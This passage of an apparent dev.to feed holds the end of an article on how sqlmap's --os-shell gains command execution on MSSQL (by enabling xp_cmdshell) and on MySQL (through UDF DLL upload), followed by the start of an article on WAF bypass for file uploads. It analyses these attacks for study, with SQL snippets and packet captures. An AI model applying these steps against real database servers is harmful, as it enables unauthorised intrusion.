&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" alt=" " width="800" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" alt=" " width="800" height="69"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Following the HTTP stream reveals URL‑encoded content. Once decoded, it is apparent that the file is written to disk using &lt;code&gt;INTO OUTFILE&lt;/code&gt;. The trojan’s code is hex‑encoded; decoding it exposes an upload‑capable script.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2 – The uploaded trojan is used to transfer the actual shell.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" alt=" " width="800" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tracking the HTTP stream shows the shell’s source code in the request body.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3 – Commands are passed to the shell for execution.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" alt=" " width="625" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4 – The shell is deleted.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" alt=" " width="668" height="243"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A command is issued to remove the shell file.&lt;/p&gt;




&lt;h2&gt;
  
  
  Database‑Based &lt;code&gt;--os-shell&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;When the database permits external connections, sqlmap can obtain a shell directly via the &lt;code&gt;--os-shell&lt;/code&gt; flag.&lt;/p&gt;

&lt;h3&gt;
  
  
  Microsoft SQL Server
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database server accepts external connections.
&lt;/li&gt;
&lt;li&gt;The current database user holds &lt;code&gt;sa&lt;/code&gt; (system administrator) privileges.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With SQL Server, &lt;code&gt;--os-shell&lt;/code&gt; relies on the &lt;code&gt;xp_cmdshell&lt;/code&gt; extended stored procedure to execute operating system commands.&lt;/p&gt;




&lt;h4&gt;
  
  
  Test Environment
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2016 Datacenter
&lt;/li&gt;
&lt;li&gt;Database: Microsoft SQL Server 2008
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sqlmap is used to connect to the database.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sqlmap &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"mssql://user:password@ip:port/dbname"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" alt=" " width="798" height="122"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sqlmap does not ship with the &lt;code&gt;pymssql&lt;/code&gt; module; it must be installed manually.&lt;/p&gt;

&lt;p&gt;After executing &lt;code&gt;python -m pip install pymssql&lt;/code&gt;, the connection is established successfully.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" alt=" " width="800" height="180"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; command is then issued.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" alt=" " width="799" height="310"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this point, sqlmap performs three key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identifies the database type and displays it.
&lt;/li&gt;
&lt;li&gt;Checks whether the current user is a database administrator (i.e., verifies &lt;code&gt;sa&lt;/code&gt; privileges).
&lt;/li&gt;
&lt;li&gt;Determines whether &lt;code&gt;xp_cmdshell&lt;/code&gt; is enabled; if it is not, sqlmap attempts to enable it.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In this instance, sqlmap was unable to activate &lt;code&gt;xp_cmdshell&lt;/code&gt; automatically.&lt;/p&gt;

&lt;p&gt;Consequently, &lt;code&gt;--sql-shell&lt;/code&gt; was used to enable it manually:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_configure&lt;/span&gt; &lt;span class="s1"&gt;'show advanced options'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;RECONFIGURE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_configure&lt;/span&gt; &lt;span class="s1"&gt;'xp_cmdshell'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;RECONFIGURE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" alt=" " width="800" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When &lt;code&gt;RECONFIGURE;&lt;/code&gt; was executed, sqlmap reported a syntax error.&lt;/p&gt;

&lt;p&gt;A Python script calling the &lt;code&gt;pymssql&lt;/code&gt; module was written to isolate the issue.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;SELECT @@version;&lt;/code&gt; command could be executed successfully.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" alt=" " width="800" height="234"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The error produced when executing &lt;code&gt;RECONFIGURE;&lt;/code&gt; matched the error observed in &lt;code&gt;--sql-shell&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" alt=" " width="799" height="269"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because sqlmap uses the &lt;code&gt;pymssql&lt;/code&gt; module for database connections, it was necessary to enable &lt;code&gt;xp_cmdshell&lt;/code&gt; using an alternative tool. Navicat was employed for this purpose.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" alt=" " width="566" height="608"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The commands to enable &lt;code&gt;xp_cmdshell&lt;/code&gt; were then executed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once enabled, commands could be issued either through Navicat or by using sqlmap’s &lt;code&gt;--os-shell&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" alt=" " width="717" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" alt=" " width="800" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If a tool such as Navicat is used for the initial connection, one must manually verify whether the user is a database administrator and whether &lt;code&gt;xp_cmdshell&lt;/code&gt; is present.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'sysadmin'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This determines if the user holds the &lt;code&gt;sa&lt;/code&gt; role.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;COUNT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dbo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sysobjects&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;xtype&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'x'&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'xp_cmdshell'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A result of &lt;code&gt;1&lt;/code&gt; indicates that &lt;code&gt;xp_cmdshell&lt;/code&gt; exists.&lt;/p&gt;

&lt;p&gt;After these checks, the process follows the same pattern described above.&lt;/p&gt;




&lt;p&gt;A Wireshark capture of the TCP stream reveals the data sent.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" alt=" " width="800" height="271"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The code was copied to a text file and certain characters were replaced.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" alt=" " width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before executing the user‑supplied command, sqlmap runs &lt;code&gt;ping -n 10 127.0.0.1&lt;/code&gt; and &lt;code&gt;echo 1&lt;/code&gt; (marked as ① and ② in the figure). The commands that follow (③ onwards) are hex‑encoded.&lt;/p&gt;

&lt;h3&gt;
  
  
  MySQL
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database server permits external connections.
&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;secure_file_priv&lt;/code&gt; variable is either empty or set to a writable path.
&lt;/li&gt;
&lt;li&gt;Write access to the MySQL installation directory is available.
&lt;/li&gt;
&lt;li&gt;For versions greater than 5.1, the &lt;code&gt;/lib/plugin&lt;/code&gt; directory must exist.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The MySQL &lt;code&gt;--os-shell&lt;/code&gt; method leverages user‑defined functions (UDFs) to execute commands. This topic is covered in greater detail in the article &lt;a href="https://cooltige.github.io/2020/06/02/Mysql-Udf%E6%8F%90%E6%9D%83/" rel="noopener noreferrer"&gt;MySQL UDF Privilege Escalation&lt;/a&gt;.&lt;/p&gt;




&lt;h4&gt;
  
  
  Test Environment
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2012 Standard
&lt;/li&gt;
&lt;li&gt;Database: MySQL 5.1.60
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sqlmap is used to connect to the database.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" alt=" " width="800" height="126"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After installing &lt;code&gt;pymysql&lt;/code&gt;, a second connection attempt is made; upon success, sqlmap displays the approximate database version.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" alt=" " width="799" height="146"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; flag is then issued.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" alt=" " width="799" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this point, sqlmap performs five key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Connects to the MySQL database and retrieves its version.
&lt;/li&gt;
&lt;li&gt;Verifies whether the current user is a database administrator.
&lt;/li&gt;
&lt;li&gt;Checks if the &lt;code&gt;sys_exec&lt;/code&gt; and &lt;code&gt;sys_eval&lt;/code&gt; functions have already been created.
&lt;/li&gt;
&lt;li&gt;Uploads the appropriate DLL file to the target directory.
&lt;/li&gt;
&lt;li&gt;When the user exits, removes the &lt;code&gt;sys_exec&lt;/code&gt; and &lt;code&gt;sys_eval&lt;/code&gt; functions (by default).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;A Wireshark TCP stream capture is analysed. The image below provides a detailed illustration of the process.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" alt=" " width="600" height="1188"&gt;&lt;/a&gt;&lt;/p&gt;




</description>
      <category>sql</category>
      <category>sqlmap</category>
      <category>shell</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>A Comprehensive Overview of WAF Bypass Methods for File Upload Vulnerabilities</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 08 Jun 2026 02:06:22 +0000</pubDate>
      <link>https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4</link>
      <guid>https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4</guid>
      <description>&lt;h2&gt;
  
  
  Analysis of HTTP File Upload Packets
&lt;/h2&gt;

&lt;p&gt;File upload is fundamentally a client-side POST request wherein the message body contains upload information. The front-end upload page must specify an &lt;code&gt;enctype&lt;/code&gt; of &lt;code&gt;multipart/form-data&lt;/code&gt; to permit a successful upload.&lt;/p&gt;

&lt;p&gt;A typical file upload packet resembles the following:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;http://www.example.com&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryyb1zYhTI38xpQxBK&lt;/span&gt;

------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="city_id"

1
------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="company_id"

2
------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="file"; filename="chrome.png"
Content-Type: image/png

PNG ... content of chrome.png ...
------WebKitFormBoundaryyb1zYhTI38xpQxBK--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The following characteristics may be extracted from the above:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The request header &lt;code&gt;Content-Type&lt;/code&gt; exhibits these features:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;multipart/form-data&lt;/code&gt; – indicates that the request is a file upload request.&lt;/li&gt;
&lt;li&gt;Presence of a &lt;code&gt;boundary&lt;/code&gt; string – serves as a delimiter to separate POST data.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;The POST body contains:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;Content-Disposition&lt;/code&gt; – a response header that indicates whether the content is expected to be displayed inline in the browser.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;name&lt;/code&gt; – the name of the HTML form field referenced by this part.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;filename&lt;/code&gt; – a string that holds the original name of the file being transmitted.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;The value of &lt;code&gt;boundary&lt;/code&gt; in the POST body is the value declared in &lt;code&gt;Content-Type&lt;/code&gt; prefixed with two hyphens &lt;code&gt;--&lt;/code&gt;, except for the final closing boundary.&lt;/li&gt;

&lt;li&gt;The closing boundary appends two additional hyphens by default (in testing, removing the last boundary line does not prevent a successful upload).&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  Modifiable Elements in a File Upload Packet
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Content-Disposition&lt;/strong&gt; – generally alterable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;name&lt;/strong&gt; – the form parameter value; should not be altered.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;filename&lt;/strong&gt; – the file name; can be modified.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content-Type&lt;/strong&gt; – the file MIME type; can be changed depending on context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;boundary&lt;/strong&gt; – the content delimiter; can be modified.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How WAFs Intercept Malicious Files
&lt;/h2&gt;

&lt;p&gt;Consider how one might design a WAF. Defence may be approached from several angles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;File name&lt;/strong&gt; – parse the file name and determine whether it appears in a blacklist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File content&lt;/strong&gt; – parse the file content to detect whether it constitutes a webshell.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File directory permissions&lt;/strong&gt; – typically requires a host-based WAF.&lt;/li&gt;
&lt;/ul&gt;

